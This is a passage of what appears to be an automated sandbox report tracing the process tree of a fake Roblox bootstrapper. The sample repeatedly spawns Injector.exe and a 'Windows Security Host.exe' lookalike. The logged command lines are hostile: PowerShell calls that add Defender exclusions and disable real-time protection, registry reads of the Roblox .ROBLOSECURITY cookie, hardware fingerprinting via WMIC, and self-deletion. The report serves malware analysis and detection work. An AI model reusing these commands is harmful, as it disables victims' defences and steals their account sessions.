        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        17⤵
        Checks computer location settings
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        18⤵
        Executes dropped EXE
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        18⤵
        Executes dropped EXE
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        18⤵
        Checks computer location settings
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        19⤵
        Executes dropped EXE
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        19⤵
        Executes dropped EXE
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        19⤵
        Checks computer location settings
        
        PID:416
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        20⤵
        Executes dropped EXE
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        20⤵
        Executes dropped EXE
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        20⤵
        Checks computer location settings
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        21⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:4580
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        22⤵
        Views/modifies file attributes
        
        PID:2804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        
        PID:3700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:2740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:416
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:3728
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:696
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:4876
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1984
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        21⤵
        Executes dropped EXE
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        21⤵
        Checks computer location settings
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        22⤵
        Executes dropped EXE
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        22⤵
        Executes dropped EXE
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        22⤵
        Checks computer location settings
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        23⤵
        Executes dropped EXE
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        23⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        23⤵
        Checks computer location settings
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        24⤵
        Executes dropped EXE
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        24⤵
        Executes dropped EXE
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        24⤵
        Checks computer location settings
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        25⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1928
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:3164
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        26⤵
        Views/modifies file attributes
        
        PID:4136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:3632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:3516
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:2056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:3220
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2064
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        25⤵
        Executes dropped EXE
        
        PID:456
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        25⤵
        Checks computer location settings
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        26⤵
        Executes dropped EXE
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        26⤵
        Executes dropped EXE
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        26⤵
        Checks computer location settings
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        27⤵
        Executes dropped EXE
        
        PID:2892
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        27⤵
        Executes dropped EXE
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        27⤵
        Checks computer location settings
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        28⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:3332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:696
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        29⤵
        Views/modifies file attributes
        
        PID:3084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:1692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:3568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:1876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:3968
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3528
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        28⤵
        Executes dropped EXE
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        28⤵
        Checks computer location settings
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        29⤵
        Executes dropped EXE
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        29⤵
        Executes dropped EXE
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        29⤵
        Checks computer location settings
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        30⤵
        Executes dropped EXE
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        30⤵
        Executes dropped EXE
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        30⤵
        Checks computer location settings
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        31⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1240
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        32⤵
        Views/modifies file attributes
        
        PID:2596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:3940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:4620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:2032
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4452
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        31⤵
        Executes dropped EXE
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        31⤵
        Checks computer location settings
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        32⤵
        Executes dropped EXE
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        32⤵
        Executes dropped EXE
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        32⤵
        Checks computer location settings
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        33⤵
        Executes dropped EXE
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        33⤵
        Executes dropped EXE
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        33⤵
        Checks computer location settings
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        34⤵
        
        PID:1204
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        34⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        34⤵
        Checks computer location settings
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        35⤵
        Drops file in Drivers directory
        
        PID:2076
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:4356
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        36⤵
        Views/modifies file attributes
        
        PID:1472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1240
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:1572
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:4972
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:3292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3764
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:4024
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1672
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        35⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        35⤵
        Checks computer location settings
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        36⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        36⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        36⤵
        Checks computer location settings
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        37⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        37⤵
        Checks computer location settings
        Drops startup file
        Adds Run key to start application
        Suspicious use of SetWindowsHookEx
        
        PID:3692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\znrubj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\znrubj.exe"
        38⤵
        Impair Defenses: Safe Mode Boot
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        37⤵
        Checks computer location settings
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        38⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        38⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        38⤵
        Checks computer location settings
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        39⤵
        Drops file in Drivers directory
        
        PID:4032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:4460
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        40⤵
        Views/modifies file attributes
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:8
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        40⤵
        
        PID:4884
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        40⤵
        
        PID:1204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
